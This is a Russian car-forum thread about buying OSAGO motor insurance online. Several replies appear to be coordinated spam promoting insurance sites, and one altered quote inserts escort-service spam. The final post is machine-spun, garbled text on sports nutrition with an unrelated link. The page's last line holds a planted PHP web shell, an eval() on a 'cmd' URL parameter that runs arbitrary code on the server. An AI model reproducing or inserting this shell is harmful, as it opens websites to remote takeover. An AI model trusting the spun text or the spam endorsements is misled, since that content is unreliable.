+ Ответить в теме
Показано с 1 по 9 из 9

Тема: ОСАГО


  1. #1
    Мимо проходил moonprincess is on a distinguished road Аватар для moonprincess
    Регистрация
    06.04.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    19

    ОСАГО

    Можно ли в онлайн режиме оформить страховой полис ОСАГО? Сколько это займёт времени?

  2. #2
    Мимо проходил hegogom is on a distinguished road Аватар для hegogom
    Регистрация
    06.04.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    22
    В интернете без проблем можно оформить страховой полис, и займёт это очень мало времени.. Я примерно за минут 10 справился, можете попробовать.

  3. #3
    Мимо проходил basos is on a distinguished road Аватар для basos
    Регистрация
    06.04.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    24
    Здравствуйте, если вы хотите оформить страховой полис осаго в онлайн режиме, и не знаете как и где это можно сделать, тогда советую посетить интернет портал https://kia-agatauto.ru/. Я здесь оформлял осаго, по времени заняло около 15 минут.

  4. #4
    Мимо проходил absolute is on a distinguished road Аватар для absolute
    Регистрация
    14.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    26
    Цитата Сообщение от hegogom Посмотреть сообщение
    В интернете без проблем можно оформить страховой полис, и займёт это очень мало времени.. Я примерно за минут 10 справился, заказ индивидуалок) можете попробовать.
    да, счас почти все можно сделать не выходя из дома)

  5. #5
    Мимо проходил Benver is on a distinguished road Аватар для Benver
    Регистрация
    29.05.2020
    Откуда
    HРФ
    Машина
    мой
    Сообщений
    34
    А можно как-то узнать свой КБМ онлайн? И что для этого требуется? Или может как-то самому его рассчитать? У меня ни одного ДТП не было. Вот как повезло.

  6. #6
    Мимо проходил Galvin is on a distinguished road Аватар для Galvin
    Регистрация
    28.05.2020
    Откуда
    РФ
    Машина
    GTI
    Сообщений
    29
    Конечно можно. Есть минимум несколько сервисов которые позволяют узнать вам свой КБМ. Я вот этим сайтом пользуюсь https://e-osago.ru/blog/proverka-kbm...s-osago-v-rsa/ тут все просто и самое главное бесплатно. На этом сайте и другие данные можно узнать, например проверить свою диагностическую карту. Это тоже надо сделать перед тем как идти в страховую компанию. У меня уже скидка кстати по ОСАГО 10%.

  7. #7
    Мимо проходил zemcor is on a distinguished road Аватар для zemcor
    Регистрация
    27.08.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    17
    А я вот тоже решил онлайн оформить осаго, до этого ездил в офис страховой. А сейчас подумал, зачем время тратить, когда можно все через интернет оформить. Вот только страховую хочу поменять. где сейчас выгодней страховать?

  8. #8
    Мимо проходил Rostikk is on a distinguished road Аватар для Rostikk
    Регистрация
    05.12.2018
    Сообщений
    55
    Да конечно, проще оформить осаго онлайн, зачем куда-то ехать для этого. Но тут ведь еще не только стоимость полиса имеет значение, но и надежность страховой. Для меня это на первом месте. А вообще вы можете зайти на сайт mafin ру, там можно выбрать самое выгодное предложение по СК и сразу все онлайн и оформить https://mafin.ru/osago. Я через этот сервис страховку себе уже второй год покупаю

  9. #9
    Мимо проходил Juliannutle is on a distinguished road Аватар для Juliannutle
    Регистрация
    27.10.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    2

    магазин спортивного питания рядом

    После последние 100 лет человечеству удалось сделать высокий аллюр будущий в понимании того, сиречь и почему различные продукты питания и пищевые добавки могут помочь спортсменам в улучшении их физических и спортивных показателей [1,2]. Возможно, который большая значимость ради атлетов и огромное состав информации, полученной из историко-научных источников, привели к началу производства специального спортивного питания, возьмем, энергетических гелей, жвачек, батончиков и напитков, рассчитанных для совершенствование большого разнообразия факторов, влияющих для потенциал спортсменов [3]. К числу последних относят мышечные судороги, бессилие запасов гликогена, величина и реставрация мышц. В настоящее дата возросшая популярность университетских программ сообразно изучению спортивного питания позволяет жить множество исследований для вещь того, вроде современные и наиболее почасту используемые ингредиенты способствуют избавлению через указанных ранее факторов посредством надлежащего дозирования и времени приема таковых [4].

    Только воздействие на https://www.volzsky.ru/press-relize.php?id=12203 значительное усиление числа спортсменов, соревнующихся в таких дисциплинах, требующих гигантский выносливости, вроде марафоны, триатлоны и 100-мильные велосипедные гонки, появилась волна новых продуктов спортивного питания и смесей, рассчитанных на повышение выносливости атлетов.

    Адаптация спортивного питания к конкретным потребностям спортсменов также будет популярным направлением в сфере спортивного питания в ближайшем будущем [5]. Лидирующие позиции в данном направлении занимают такие компании, как Infinit и Nutrition, которые предоставляют мочь сам выделывать пропорции составных элементов продукта и чьи особые смеси с такими ингредиентами, словно углеводы, белки, аминокислоты, кофеин и электролиты, позволяют уникальным образом помогать здоровье спортсменов, задабривать потребности организма, возникающие в процессе подготовки к соревнованиям, а также доходить необходимых спортивных результатов. Паки одна компания почти названием YouBar предоставляет услуги сообразно производству продуктов спортивного питания сообразно индивидуальному заказу, например, дозволительно самостоятельно сформировать пропорцию для энергетического батончика, протеинового коктейля разве злаковой каши. Помимо этого, существуют такие компании, чистый Vitaganic, у которых позволительно сделать личный заказ смесей витаминов, минералов и трав, рассчитанных на достижение специфических целей в спорте посредством их ежедневного приема [6].

    Целью настоящего исследования явилась классификации продуктов чтобы спортивного питания и приговор направления и технологии их использования ради управления процессом восстановления спортсменов.

    Область спортивного питания довольно развивающаяся, поэтому даже в течение года представления относительный эффективности той иначе другой добавки могут меняться в диаметрально противоположных направлениях. Классическая разделение добавок делит их сообразно степени их эффективности и доказательности: «непременно эффективные» – разряд А, «пожалуй эффективные» – разряд В, «непременно неэффективные» – комната С и «недостаточно исследованные» – сословие D [7]. Изза прошедшие пять лет в исходную классификацию добавок внесено немало изменений. В изображение включен гряда новинок, появившихся за это срок на рынке спортивного питания.

    Некоторые специалисты могут не предполагать с отдельными данными и их трактовкой, либо с классификацией той разве иной добавки. Безусловно, предложенная разделение и представления относительный эффективности будут со временем изменяться, сообразно мере того, будто будут делать данные новых исследований. Отметим, сколько наша трактовка основана для самых последних исследованиях и получила хорошие рецензии в научных кругах.

    Спортивные добавки могут кормить углеводы, белки, жиры, минералы, витамины, лекарственные травы, ферменты, промежуточные продукты метаболизма (такие словно аминокислоты), различные экстракты растений. В целом добавки (например, энергетические батончики, заменители питания, коктейли и др.) обеспечивают комфортное достижение определенных результатов, таких словно снижение/набор массы, исправление силовых и прочих спортивных показателей [8].

    В зависимости через результата, достигаемого применением того разве иного вида спортивного питания, дозволено выделить следующие типы добавок:

+ Ответить в теме

Похожие темы

  1. Осаго
    от Oxoxo в разделе Курилка
    Ответов: 4
    Последнее сообщение: 24.10.2023, 05:32
  2. ОСАГО
    от ИгорьЦарь в разделе Курилка
    Ответов: 2
    Последнее сообщение: 12.03.2021, 11:10
  3. ОСАГО
    от Нибелунг в разделе Разное
    Ответов: 4
    Последнее сообщение: 03.03.2021, 15:14
  4. Про ОСАГО
    от Milana в разделе Курилка
    Ответов: 6
    Последнее сообщение: 22.05.2020, 22:53
  5. Осаго
    от Trety в разделе Курилка
    Ответов: 3
    Последнее сообщение: 04.03.2020, 13:27

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}